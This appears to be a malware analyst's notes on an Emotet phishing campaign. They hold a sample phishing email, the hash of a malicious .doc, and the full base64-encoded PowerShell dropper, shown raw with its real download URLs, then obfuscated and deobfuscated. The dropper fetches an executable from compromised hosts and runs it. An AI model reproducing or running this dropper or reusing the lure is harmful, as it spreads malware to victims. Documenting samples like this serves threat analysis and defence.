170821 Emotet Trojan

# Phishing Email

Hi [recipient],


 I’ve tried to call you but couldn’t get thought. Need to know the status of this invoice I’ve sent to you a while ago. provided a copy below.

http://advancedalternatives[dot]co.th/Invoice-number-154082/

Best Regards,
[fake sender name]

# Linked Payload

Stage 1 payload is a .doc file which executes the powershell below.
SHA256: f13e2c5ae7e3f949a575856fb0b5d285eae746c7b77cf6272a6e11e99fcec9e6

Stage 2 payload downloaded from the URLs found in the deobfuscated section below. Haven't analyzed yet.

# Original Stage 1 Payload

JAB7AFcAYABzAEMAcgBgAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwB0ACcALAAnAGIAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABsACcALAAnAGUAJwAsACcAVwBTAGMAcgBpAHAAdAAuAFMAJwAsACcAaAAnACkAOwAkAHsAVwBFAGAAQgBgAGMAYABMAEkARQBOAFQAfQAgAD0AIAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlACcALAAnAGMAdAAnACwAJwBuAGUAdwAtAG8AYgBqACcAKQAgACgAIgB7ADIAfQB7ADUAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADYAfQAiAC0AZgAnAFcAZQBiAEMAbABpACcALAAnAC4AJwAsACcAUwB5AHMAdAAnACwAJwBlACcALAAnAE4AZQB0AC4AJwAsACcAZQBtACcALAAnAG4AdAAnACkAOwAkAHsAUgBBAG4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHcALQBvACcALAAnAG4AZQAnACwAJwBiAGoAZQBjAHQAJwApACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtACcALAAnAHIAYQBuAGQAbwAnACkAOwAkAHsAVQByAGAAbABzAH0AIAA9ACAAKAAiAHsAMQA0AH0AewAyADAAfQB7ADEAOQB9AHsAMQAzAH0AewAwAH0AewAxADcAfQB7ADMAfQB7ADIAMwB9AHsANAB9AHsANwB9AHsAMQA4AH0AewA1AH0AewAxADUAfQB7ADIAOQB9AHsAOQB9AHsANgB9AHsAMwAwAH0AewAyAH0AewAyADEAfQB7ADEAMQB9AHsAMQB9AHsAMgA4AH0AewAyADYAfQB7ADEAMgB9AHsAOAB9AHsAMgA3AH0AewAyADQAfQB7ADEANgB9AHsAMgAyAH0AewAxADAAfQB7ADIANQB9ACIAIAAtAGYAJwBxAG4AaAAnACwAJwBJAG4AVgBUAC8ALAAnACwAJwAvAHoAcgAnACwAJwB0ACcALAAnAC8ALwB3ACcALAAnAGkAZwBuAC4AYwBvAG0ALgBhAHUALwAnACwAJwB0AGkAdgBlAGkAdAAnACwAJwBpACcALAAnAHIAdABzACcALAAnAGUAYwAnACwAJwB3AEoAJwAsACcARwAnACwAJwBvACcALAAnAC8AbwBoAGwAZQByAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwAnACwAJwBoACcALAAnAEUAbQBPAFkAegBjAGkAJwAsACcAeQBvAGYAJwAsACcAdgBxAEwAZQBHAGQAcwAvACwAaAAnACwAJwBsAHMAbwBuAGQAZQBzACcALAAnAHAAOgAvACcALAAnAHQAdAAnACwAJwBNACcALAAnAGQAYQBsAGwAYQBzAC4AYwBvAG0ALwBGACcALAAnAHQAcAA6ACcALAAnAG8AbQAuAGIAcgAvAEEARQBWAEgAVgAvACwAaAB0AHQAcAA6AC8ALwBuAHUAYgBvAGQAJwAsACcAUwBnAHYAUABLAEYALwAnACwAJwA6AC8ALwBwACcALAAnAGUAdgBlAG4ALgBjACcALAAnAGgAdAB0AHAAJwAsACcAWABOAC8ALABoAHQAdABwADoALwAvAGUAZgBmACcALAAnAC4AYwBvAG0ALgBhAHUAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBTAHAAbABpACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAGAAQQBNAGUAfQAgAD0AIAAkAHsAUgBgAEEAYABOAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGEAYABUAGgAfQAgAD0AIAAkAHsAZQBgAE4AVgA6AGAAVABlAG0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAEEAYABtAGUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC4AJwAsACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewBVAGAAUgBsAH0AIABpAG4AIAAkAHsAVQByAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAZQBgAEIAQwBMAGAAaQBgAGUAbgB0AH0ALgAoACIAewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAJwBEACcALAAnAG8AdwBuAGwAJwAsACcAYQBkAEYAaQBsAGUAJwAsACcAbwAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbgBnACcALAAnAFQAbwBTAHQAcgBpACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYQBgAFQASAB9ACkAOwAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAdAAtAFAAcgAnACwAJwBvAGMAJwAsACcAZQBzAHMAJwAsACcAUwB0AGEAcgAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7ACYAKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBoAG8AcwB0ACcALAAnAHIAaQB0ACcALAAnAGUALQAnACkAIAAkAHsAXwB9AC4AIgBFAGAAWABjAGUAcABUAGAAaQBvAG4AIgAuACIATQBFAHMAUwBgAEEAYABHAEUAIgA7AH0AfQANAAoA

# Decoded

${W`sCr`IPt} = .("{0}{2}{1}" -f'new-o','t','bjec') -ComObject ("{2}{3}{1}{0}"-f 'll','e','WScript.S','h');
${WE`B`c`LIENT} = .("{2}{0}{1}" -f 'e','ct','new-obj') ("{2}{5}{1}{4}{0}{3}{6}"-f'WebCli','.','Syst','e','Net.','em','nt');
${RAn`D`OM} = &("{1}{0}{2}"-f 'w-o','ne','bject') ("{1}{0}" -f'm','rando');
${Ur`ls} = ("{14}{20}{19}{13}{0}{17}{3}{23}{4}{7}{18}{5}{15}{29}{9}{6}{30}{2}{21}{11}{1}{28}{26}{12}{8}{27}{24}{16}{22}{10}{25}" -f'qnh','InVT/,','/zr','t','//w','ign.com.au/','tiveit','i','rts','ec','wJ','G','o','/ohleronline.com/','h','EmOYzci','yof','vqLeGds/,h','lsondes','p:/','tt','M','dallas.com/F','tp:','om.br/AEVHV/,http://nubod','SgvPKF/','://p','even.c','http','XN/,http://eff','.com.au').("{1}{0}"-f't','Spli').Invoke(',');
${N`AMe} = ${R`A`NdOM}.("{0}{1}"-f 'n','ext').Invoke(1, 65536);
${Pa`Th} = ${e`NV:`TemP} + '\' + ${NA`me} + ("{0}{1}" -f'.','exe');
foreach(${U`Rl} in ${Ur`Ls}){try{${we`BCL`i`ent}.("{0}{1}{3}{2}"-f'D','ownl','adFile','o').Invoke(${U`RL}.("{1}{0}" -f 'ng','ToStri').Invoke(), ${Pa`TH});
&("{3}{0}{1}{2}" -f't-Pr','oc','ess','Star') ${p`AtH};
break;
}catch{&("{0}{2}{3}{1}"-f'w','host','rit','e-') ${_}."E`XcepT`ion"."MEsS`A`GE";
}}

# Deobfuscated

$WScript = New-Object -ComObject WScript.Shell;
$WebClient = New-Object System.Net.WebClient;
$Random = New-Object random;
$Urls = {"http://ohleronline[dot]com/qnhvqLeGds/",
    "http://wilsondesign[dot]com.au/EmOYzciXN/",
    "http://effectiveit[dot]com.au/zrMGInVT/",
    "http://portseven[dot]com.br/AEVHV/",
    "http://nubodyofdallas[dot]com/FwJSgvPKF/"
};
$Name = $Random.Next.Invoke(1, 65536);
$Path = $EnvTemp + '\' + $Name + '.exe';

foreach($Url in $Urls) {
    try {
        $WebClient.DownloadFile.Invoke($Url.ToString.Invoke(), $Path);
        Start-Process $Path;
        Break;
    } catch {
        Write-Host $Exception.Message;
    }
}